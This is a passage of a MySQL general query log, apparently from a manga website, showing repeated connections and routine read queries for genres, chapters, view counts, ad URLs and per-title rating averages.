'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644977 Quit 330644969 Quit 330644978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644978 Quit 330644979 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644979 Quit 330644980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644980 Quit 330644981 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644981 Quit 330644982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644982 Quit 330644983 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644983 Quit 330644984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644984 Quit 330644985 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644985 Quit 260225 19:28:37 330644986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644986 Quit 330644987 Query select k.* from (select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where genres like '%Parody%') as k where latest_chapter_id > 0 330644987 Quit 330644988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644988 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where m.genres like '%Parody%' group by manga_id ORDER BY sum(view) DESC 330644988 Quit 330644989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644989 Quit 330644990 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644990 Quit 330644991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330644991 Quit 330644992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644992 Quit 330644993 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY RAND() DESC limit 10 260225 19:28:38 330644993 Quit 330644994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644994 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 30 330644994 Quit 330644995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644995 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330644995 Quit 330644996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644996 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id AND m.status = 'Finished') group by r.manga_id) as k ORDER BY k.id DESC 330644996 Quit 330644997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644997 Quit 330644998 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644998 Quit 330644999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330644999 Quit 330645000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330645000 Quit 330645001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330645001 Quit 330645002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330645002 Quit 330645003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330645003 Quit 330645004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330645004 Quit 330645005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330645005 Quit 330645006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330645006 Quit 330645007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330645007 Quit 330645008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330645008 Quit 330645009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330645009 Quit 330645010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645010 Query select * FROM chapters where manga_id = '387' order by created desc limit 1 330645010 Quit 330645011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330645011 Quit 330645012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645012 Query select * FROM chapters where manga_id = '272' order by created desc limit 1 330645012 Quit 330645013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330645013 Quit 330645014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645014 Query select * FROM chapters where manga_id = '361' order by created desc limit 1 330645014 Quit 330645015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330645015 Quit 330645016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645016 Query select * FROM chapters where manga_id = '57' order by created desc limit 1 330645016 Quit 330645017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330645017 Quit 330645018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645018 Query select * FROM chapters where manga_id = '285' order by created desc limit 1 330645018 Quit 330645019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330645019 Quit 330645020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645020 Query select * FROM chapters where manga_id = '104' order by created desc limit 1 330645020 Quit 330645021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330645021 Quit 330645022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645022 Query select * FROM chapters where manga_id = '290' order by created desc limit 1 330645022 Quit 330645023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330645023 Quit 330645024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645024 Query select * FROM chapters where manga_id = '40' order by created desc limit 1 330645024 Quit 330645025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330645025 Quit 330645026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645026 Query select * FROM chapters where manga_id = '386' order by created desc limit 1 330645026 Quit 330645027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330645027 Quit 330645028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645028 Query select * FROM chapters where manga_id = '385' order by created desc limit 1 330645028 Quit 330645029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330645029 Quit 330645030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645030 Query select * FROM chapters where manga_id = '384' order by created desc limit 1 330645030 Quit 330645031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330645031 Quit 330645032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645032 Query select * FROM chapters where manga_id = '382' order by created desc limit 1 330645032 Quit 330645033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330645033 Quit 330645034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645034 Query select * FROM chapters where manga_id = '80' order by created desc limit 1 330645034 Quit 330645035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330645035 Quit 330645036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645036 Query select * FROM chapters where manga_id = '377' order by created desc limit 1 330645036 Quit 330645037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330645037 Quit 330645038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645038 Query select * FROM chapters where manga_id = '390' order by created desc limit 1 330645038 Quit 330645039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330645039 Quit 330645040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645040 Query select * FROM chapters where manga_id = '327' order by created desc limit 1 330645040 Quit 330645041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330645041 Quit 330645042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645042 Query select * FROM chapters where manga_id = '376' order by created desc limit 1 330645042 Quit 330645043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330645043 Quit 330645044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645044 Query select * FROM chapters where manga_id = '373' order by created desc limit 1 330645044 Quit 330645045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330645045 Quit 330645046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645046 Query select * FROM chapters where manga_id = '388' order by created desc limit 1 330645046 Quit 330645047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330645047 Quit 330645048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645048 Query select * FROM chapters where manga_id = '173' order by created desc limit 1 330645048 Quit 330645049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330645049 Quit 330645050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645050 Query select * FROM chapters where manga_id = '35' order by created desc limit 1 330645050 Quit 330645051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330645051 Quit 330645052 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645052 Query select * FROM chapters where manga_id = '296' order by created desc limit 1 330645052 Quit 330645053 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330645053 Quit 330645054 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645054 Query select * FROM chapters where manga_id = '22' order by created desc limit 1 330645054 Quit 330645055 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330645055 Quit 330645056 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645056 Query select * FROM chapters where manga_id = '83' order by created desc limit 1 330645056 Quit 330645057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330645057 Quit 330645058 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645058 Query select * FROM chapters where manga_id = '346' order by created desc limit 1 330645058 Quit 330645059 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330645059 Quit 330645060 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645060 Query select * FROM chapters where manga_id = '240' order by created desc limit 1 330645060 Quit 330645061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330645061 Quit 330645062 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645062 Query select * FROM chapters where manga_id = '50' order by created desc limit 1 330645062 Quit 330645063 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330645063 Quit 330645064 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645064 Query select * FROM chapters where manga_id = '27' order by created desc limit 1 330645064 Quit 330645065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330645065 Quit 330645066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645066 Query select * FROM chapters where manga_id = '92' order by created desc limit 1 330645066 Quit 330645067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330645067 Quit 330645068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645068 Query select * FROM chapters where manga_id = '289' order by created desc limit 1 330645068 Quit 330645069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330645069 Quit 330645070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330645070 Quit 330645071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330645071 Quit 330645072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330645072 Quit 330645073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330645073 Quit 330645074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330645074 Quit 330645075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330645075 Quit 330645076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330645076 Quit 330645077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330645077 Quit 330645078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330645078 Quit 330645079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330645079 Quit 330645080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330645080 Quit 330645081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330645081 Quit 330645082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330645082 Quit 330645083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330645083 Quit 330645084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330645084 Quit 330645085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330645085 Quit 330645086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330645086 Quit 330645087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330645087 Quit 330645088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330645088 Quit 330645089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330645089 Quit 330645090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330645090 Quit 330645091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330645091 Quit 330645092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330645092 Quit 330645093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330645093 Quit 330645094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330645094 Quit 330645095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330645095 Quit 330645096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330645096 Quit 330645097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330645097 Quit 330645098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330645098 Quit 330645099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330645099 Quit 330645100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330645100 Quit 330645101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330645101 Quit 330645102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330645102 Quit 330645103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330645103 Quit 330645104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330645104 Quit 330645105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330645105 Quit 330645106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330645106 Quit 330645107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330645107 Quit 330645108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330645108 Quit 330645109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330645109 Quit 330645110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330645110 Quit 330645111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330645111 Quit 330645112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330645112 Quit 330645113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330645113 Quit 330645114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330645114 Quit 330645115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330645115 Quit 330645116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330645116 Quit 330645117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330645117 Quit 330645118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330645118 Quit 330645119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330645119 Quit 330645120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330645120 Quit 330645121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330645121 Quit 330645122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330645122 Quit 330645123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330645123 Quit 330645124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330645124 Quit 330645125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330645125 Quit 330645126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330645126 Quit 330645127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330645127 Quit 330645128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330645128 Quit 330645129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330645129 Quit 330645130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330645130 Quit 330645131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330645131 Quit 330645132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330645132 Quit 330645133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645133 Query select count(id) as 